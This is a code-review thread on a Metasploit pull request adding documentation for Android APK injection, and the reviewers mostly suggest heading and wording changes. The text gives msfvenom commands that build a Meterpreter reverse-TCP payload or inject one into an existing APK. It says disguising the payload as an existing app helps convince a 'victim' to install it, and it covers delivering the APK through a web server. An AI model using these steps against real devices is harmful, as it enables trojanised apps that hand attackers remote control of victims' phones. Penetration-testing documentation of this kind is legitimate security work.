Adding documentation for apk injection (#16337)
rapid7/metasploit-framework: documentation/modules/payload/android/meterpreter/injection.md

will allow you to impersonate an existing application, which may make it easier 
to convince your victim to install the APK.

> ## Vulnerable An Existing Application

Reviewer: ```suggestion
## Inject Payload Into An Existing APK File
```

It should be possible to inject Meterpreter into any APK, however some applications
have complex resource structures which may not work with `apktool`.
Additionally some applications have security measures that prevent the application
from working as expected once it has been modified.

> ## Create Default Metasploit Android Application

Reviewer: ```suggestion
## Create Meterpreter APK File
```

> It is preferred to use an existing application, however if you don't want to use existing
> application. You can Create default metasploit android application.

Reviewer: ```suggestion
It is preferred to use an existing application; however, if you don't want to use an existing
application you can create a default metasploit android application.
```

APK Injection (as opposed to generating a single APK payload) requires a few tools
to be present on your command line already:

* [Java](https://www.oracle.com/java/technologies/downloads/) - Used for building/editing APK
* [Apktool](https://ibotpeaches.github.io/Apktool/) - Used for rebuilding the APK
* [keytool](https://docs.oracle.com/javase/8/docs/technotes/tools/unix/keytool.html) - To create and extract signing certificates
* [apksigner](https://developer.android.com/studio/command-line/apksigner) - To re-sign the APK

Installing these tools (if they are not installed already) will depend on your OS.
Apktool can be installed manually or automatically (e.g `brew install apktool` OR `apt install apktool`).
keytool and jarsigner can be installed by installing the appropriate JDK.

> ## Inject Payload Into An Existing APK File

Reviewer 2: If you want to still keep these they should be L3 headers, aka `###`.

Use:

```
./msfvenom -p android/meterpreter/reverse_tcp -x com.existing.apk LHOST=[IP] LPORT=4444 -f raw -o /tmp/android.apk
```

## Create Meterpreter APK File

```
./msfvenom -p android/meterpreter/reverse_tcp LHOST=[IP] LPORT=4444 -f raw -o /tmp/android.apk
```
## Sending apk to other Devices:

There are many method to send APK to victim's device but one of the easiest methods is using a web server.

> Next, start an Android device. Upload the APK, execute it and run it, as you would with

Reviewer 2: Not sure this section is needed.

APK Injection (as opposed to generating a single APK payload) requires a few tools
to be present on your command line already:

* [Java](https://www.oracle.com/java/technologies/downloads/) - Used for building/editing APK
* [Apktool](https://ibotpeaches.github.io/Apktool/) - Used for rebuilding the APK
* [keytool](https://docs.oracle.com/javase/8/docs/technotes/tools/unix/keytool.html) - To create and extract signing certificates

> * [jarsigner](https://docs.oracle.com/javase/7/docs/technotes/tools/windows/jarsigner.html) - To re-sign the APK

Reviewer: ```suggestion
* [apksigner](https://developer.android.com/studio/command-line/apksigner) - To re-sign the APK
```

Installing these tools (if they are not installed already) will depend on your OS.

> Apktool can be installed manually or automatically (e.g `brew install apktool` OR 'apt install apktool').

Reviewer: ```suggestion
Apktool can be installed manually or automatically (e.g `brew install apktool` OR `apt install apktool`).
```

> keytool and jarsigner can be installed by installing the appropriate JDK.

Reviewer: `jarsigner` is no longer required. `apksigner` can be installed using operating system packages `apt install apksigner`.

> ## To Create Vulnerable apk An Existing Application

Reviewer: ```suggestion
## Inject Payload Into An Existing APK File
```

Use:

```
./msfvenom -p android/meterpreter/reverse_tcp -x com.existing.apk LHOST=[IP] LPORT=4444 -f raw -o /tmp/android.apk
```

> ## To Create Default Metasploit Vulnerable apk

Reviewer: ```suggestion
## Create Meterpreter APK File
```

```
./msfvenom -p android/meterpreter/reverse_tcp LHOST=[IP] LPORT=4444 -f raw -o /tmp/android.apk
```
## Sending apk to other Devices:

> There are many method to send APK to victim's device but one of best method is using apache web server.
> Based on your Operating System Installation of apache is [discribed here](https://www.apachefriends.org/index.html). 

Reviewer: Any web server will do.

```suggestion
There are many method to send APK to victim's device but one of the easiest methods is using a web server.
```

> Next, start an Android device. Upload the APK, execute it and run it, as you would with

Reviewer: What does this mean? Presumably the user needs to download the APK file from the web server using a web browser.

Author: Yes this can be use while  sending APK to victim present on local area network. Thank You.
